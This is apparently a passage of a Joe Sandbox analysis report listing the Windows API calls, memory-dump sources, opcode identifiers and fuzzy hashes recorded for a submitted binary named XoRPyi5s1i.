                                    • Opcode ID: 2c6817e110dbc3531fa7cefae5f3d8b2fd36065b7cd3e5a8565b93f54d864c4b
                                    • Instruction ID: f1f836479ee67087962731c385c3fb31eed9dba77fe038e213621f64b6710000
                                    • Opcode Fuzzy Hash: 2c6817e110dbc3531fa7cefae5f3d8b2fd36065b7cd3e5a8565b93f54d864c4b
                                    • Instruction Fuzzy Hash: C211CA759012287AE72057A5AC4DFABBABCEF44764F10429AF508E71D0D7744E808B64
                                    APIs
                                      • Part of subcall function 0016AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0016AA79
                                      • Part of subcall function 0016AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0016AA83
                                      • Part of subcall function 0016AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0016AA92
                                      • Part of subcall function 0016AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0016AA99
                                      • Part of subcall function 0016AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0016AAAF
                                    • GetLengthSid.ADVAPI32(?,00000000,0016ADE4,?,?), ref: 0016B21B
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0016B227
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0016B22E
                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0016B247
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                    • String ID:
                                    • API String ID: 259861997-0
                                    • Opcode ID: ee90e52da5eeb2c5963e724440b946bc50dd0c03e18da2e9283b507f6f67d4eb
                                    • Instruction ID: 47703e80f128aaf1ee365f37f13ead269cf97aa5391f0b29be56c95908da676a
                                    • Opcode Fuzzy Hash: ee90e52da5eeb2c5963e724440b946bc50dd0c03e18da2e9283b507f6f67d4eb
                                    • Instruction Fuzzy Hash: 29118F72A04205AFDB189F98DC95AAEB7E9EF85308B14802DE943E7210D731AE94CB10
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0016B498
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4AA
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4C0
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0016B4DB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 58d0ac103964cd4b24f97c913ef94af86813e74dafcea3cadd5e8115e1cdc509
                                    • Instruction ID: 6699f06f45ecee7b9d161aa5129aea370947343438104be77287529fe5b4a030
                                    • Opcode Fuzzy Hash: 58d0ac103964cd4b24f97c913ef94af86813e74dafcea3cadd5e8115e1cdc509
                                    • Instruction Fuzzy Hash: AE11487A900218FFDB11DFA8CC85E9DBBB8FB08700F204091EA05B7290DB71AE51DB94
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00177352
                                    • MessageBoxW.USER32(?,?,?,?), ref: 00177385
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0017739B
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001773A2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: a81a1c5ec5a38c6c7e493f5f1bd82cef58c729120a1872e1f16649bf854c9a8b
                                    • Instruction ID: 070f1541c6995ed9f06b5f6c37e32278f87da6dd6a55ce2048b2cf9ded3ef948
                                    • Opcode Fuzzy Hash: a81a1c5ec5a38c6c7e493f5f1bd82cef58c729120a1872e1f16649bf854c9a8b
                                    • Instruction Fuzzy Hash: C7110872A04204AFC7059B6CDC05AAE7BBDAB45310F044355F935D32A1E7708D4187A0
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                    • GetStockObject.GDI32(00000011), ref: 0014D1CE
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 3ab9eeca52452c8feb871b252169ca8160280078c42f4e209725fdc6e055b808
                                    • Instruction ID: f63bf4d83584ca29d76573ce6a523f48b10b5c56eb04304d04217e166b655ff2
                                    • Opcode Fuzzy Hash: 3ab9eeca52452c8feb871b252169ca8160280078c42f4e209725fdc6e055b808
                                    • Instruction Fuzzy Hash: D611C072501509BFEF065FA0EC50EEABB69FF18768F050216FE0452060DB31DCA0DBA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction ID: 97d6aecb8008300b3bd80a6f92acb42f3bb440d7f59e8790a9db524f4c18b937
                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction Fuzzy Hash: B701483200014ABBCF165E88DC158EE3F23BB18350F598455FA2859131D33BCAB2EB81
                                    APIs
                                      • Part of subcall function 00157A0D: __getptd_noexit.LIBCMT ref: 00157A0E
                                    • __lock.LIBCMT ref: 0015748F
                                    • InterlockedDecrement.KERNEL32(?), ref: 001574AC
                                    • _free.LIBCMT ref: 001574BF
                                    • InterlockedIncrement.KERNEL32(017554D0), ref: 001574D7
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 2704283638-0
                                    • Opcode ID: e9f8a988c7d63890a81e607a3c8ba726dd51c1458620b6a3737c2a0bdee2f9f5
                                    • Instruction ID: c5bf9f79fd10494ca4a853716c6675800ea0ec52d474fcdc02dffde142e4501d
                                    • Opcode Fuzzy Hash: e9f8a988c7d63890a81e607a3c8ba726dd51c1458620b6a3737c2a0bdee2f9f5
                                    • Instruction Fuzzy Hash: 7201C431909A61EBC712AF65B54B75DBBA0BF04722F194005FC346FAD0CB206949CFC2
                                    APIs
                                    • __lock.LIBCMT ref: 00157AD8
                                      • Part of subcall function 00157CF4: __mtinitlocknum.LIBCMT ref: 00157D06
                                      • Part of subcall function 00157CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00157D1F
                                    • InterlockedIncrement.KERNEL32(?), ref: 00157AE5
                                    • __lock.LIBCMT ref: 00157AF9
                                    • ___addlocaleref.LIBCMT ref: 00157B17
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1687444384-0
                                    • Opcode ID: fb6802d1e52cdf17566d8f36146171725be2ea8eabdcfe89cfa55b627b236067
                                    • Instruction ID: 4d356d8cd1dd76b4cc76a4e69ae102fe4b7a98ce4ce3e681bac68051031d4f09
                                    • Opcode Fuzzy Hash: fb6802d1e52cdf17566d8f36146171725be2ea8eabdcfe89cfa55b627b236067
                                    • Instruction Fuzzy Hash: 32016171504B01DFD720DF75D906749B7F0EF60322F20494EE8A69B6E0CB70A688CB41
                                    APIs
                                    • _memset.LIBCMT ref: 0019E33D
                                    • _memset.LIBCMT ref: 0019E34C
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,001F3D00,001F3D44), ref: 0019E37B
                                    • CloseHandle.KERNEL32 ref: 0019E38D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: d4450b8fd0100f8a14f13c68f4693123aa2bbac1178d2fe0cb58e6220f9b3991
                                    • Instruction ID: a36ef237a8c99f49ee3f3f5cebcdceef97b565ecd3c9d8b95e49543a0a559682
                                    • Opcode Fuzzy Hash: d4450b8fd0100f8a14f13c68f4693123aa2bbac1178d2fe0cb58e6220f9b3991
                                    • Instruction Fuzzy Hash: A8F082F1540304BEE3106BE0EC45FB77EACEB08754F404421FF18EA5A2D3769E4086A8
                                    APIs
                                      • Part of subcall function 0014AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                      • Part of subcall function 0014AF83: BeginPath.GDI32(?), ref: 0014B009
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014B033
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0019EA8E
                                    • LineTo.GDI32(00000000,?,?), ref: 0019EA9B
                                    • EndPath.GDI32(00000000), ref: 0019EAAB
                                    • StrokePath.GDI32(00000000), ref: 0019EAB9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: f2425cbe088482fe344c0d8dd4f8672a01eee951d90fc1b173e2171be8adf571
                                    • Instruction ID: 20c2dce5ae7faad4796298bebff0dc6e889d8b6a495c1a5c73bb2ddbcc6b0c06
                                    • Opcode Fuzzy Hash: f2425cbe088482fe344c0d8dd4f8672a01eee951d90fc1b173e2171be8adf571
                                    • Instruction Fuzzy Hash: 3AF05E3104525ABBDB16AF94AC09FCE3F59AF16321F084201FA11614F1C7B455A1CB99
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0016C84A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0016C85D
                                    • GetCurrentThreadId.KERNEL32 ref: 0016C864
                                    • AttachThreadInput.USER32(00000000), ref: 0016C86B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: b2c21eb3434dfd925990e2ac6c43840f684d2b6bc630d6c70d71078542c49640
                                    • Instruction ID: c88687ee3d6cb8679d51c72b97c59a70d318d1bb83d8ab64b62cf424e38ba1c6
                                    • Opcode Fuzzy Hash: b2c21eb3434dfd925990e2ac6c43840f684d2b6bc630d6c70d71078542c49640
                                    • Instruction Fuzzy Hash: 89E06D71141228BADB241BA2EC0DEEB7F1CEF167A1F408121B60D95860E7B1C5D0CBE0
                                    APIs
                                    • GetCurrentThread.KERNEL32 ref: 0016B0D6
                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0016AC9D), ref: 0016B0DD
                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0016AC9D), ref: 0016B0EA
                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0016AC9D), ref: 0016B0F1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CurrentOpenProcessThreadToken
                                    • String ID:
                                    • API String ID: 3974789173-0
                                    • Opcode ID: 1318824e20d010c12fc302253c775d17ca06ff8c757bc02896598c9db95bfe3f
                                    • Instruction ID: 247d747313dbf22f7f7cd3f049647a5774df3c3842dfc30129e61cf23a04c481
                                    • Opcode Fuzzy Hash: 1318824e20d010c12fc302253c775d17ca06ff8c757bc02896598c9db95bfe3f
                                    • Instruction Fuzzy Hash: A9E086766412129BD7202FB56C0CB473BBCEF55791F018928F641D6050FB348481CB60
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 0014B496
                                    • SetTextColor.GDI32(?,000000FF), ref: 0014B4A0
                                    • SetBkMode.GDI32(?,00000001), ref: 0014B4B5
                                    • GetStockObject.GDI32(00000005), ref: 0014B4BD
                                    • GetWindowDC.USER32(?,00000000), ref: 001ADE2B
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 001ADE38
                                    • GetPixel.GDI32(00000000,?,00000000), ref: 001ADE51
                                    • GetPixel.GDI32(00000000,00000000,?), ref: 001ADE6A
                                    • GetPixel.GDI32(00000000,?,?), ref: 001ADE8A
                                    • ReleaseDC.USER32(?,00000000), ref: 001ADE95
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                    • String ID:
                                    • API String ID: 1946975507-0
                                    • Opcode ID: d39bea7d1047e8daee2bd23aa0d778abf3d0c2381006b405279ae034f575c8d9
                                    • Instruction ID: c20eb9b889c8e86c1d671f34703c89d0241835cbced6d00fb10cf14b151e7dc1
                                    • Opcode Fuzzy Hash: d39bea7d1047e8daee2bd23aa0d778abf3d0c2381006b405279ae034f575c8d9
                                    • Instruction Fuzzy Hash: F7E06D35104240AADB251B78BC09BD83B21AB12336F04C326F66A984E1D7718580CB11
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 0959b1cce9a884c5e5b677b4fb5383433e0a1dfb89c3b3aecc6168cda21b4a5a
                                    • Instruction ID: b43271019f96829e5952aae8dce25c30f7ed6d224719cc74f45866e1c2a27376
                                    • Opcode Fuzzy Hash: 0959b1cce9a884c5e5b677b4fb5383433e0a1dfb89c3b3aecc6168cda21b4a5a
                                    • Instruction Fuzzy Hash: 0AE04FB5500204EFDB045F70E88866D7BA4EB4C350F12C916FC5A87611EB7498808B50
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: 149fed72d342216e97c4893377eec135ef564e138e160c52d8fde2cb8a324aab
                                    • Instruction ID: 05711ef26221af62835ea880bfd514df5186605716547d062359ec50958f9d4d
                                    • Opcode Fuzzy Hash: 149fed72d342216e97c4893377eec135ef564e138e160c52d8fde2cb8a324aab
                                    • Instruction Fuzzy Hash: DBE046B5900200EFDB045F70E88862D7BA8EB4C350F128A1AFD5E8B620EB7898808B10
                                    APIs
                                      • Part of subcall function 001344ED: __fread_nolock.LIBCMT ref: 0013450B
                                    • _wcscmp.LIBCMT ref: 0017C65D
                                    • _wcscmp.LIBCMT ref: 0017C670
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: _wcscmp$__fread_nolock
                                    • String ID: FILE
                                    • API String ID: 4029003684-3121273764
                                    • Opcode ID: fd4aea04454ee03053965bfd735e27d92b4887a18443da89c7a1426385823980
                                    • Instruction ID: 178ddbd67565c6b7e4518070c3eb279387246044adf2870d6067b2f4ba1f4a89
                                    • Opcode Fuzzy Hash: fd4aea04454ee03053965bfd735e27d92b4887a18443da89c7a1426385823980
                                    • Instruction Fuzzy Hash: 7241F672A0420ABBDF209BA4DC81FEF77B9AF49704F004079F619EB181D770AA44CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0019A85A
                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0019A86F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
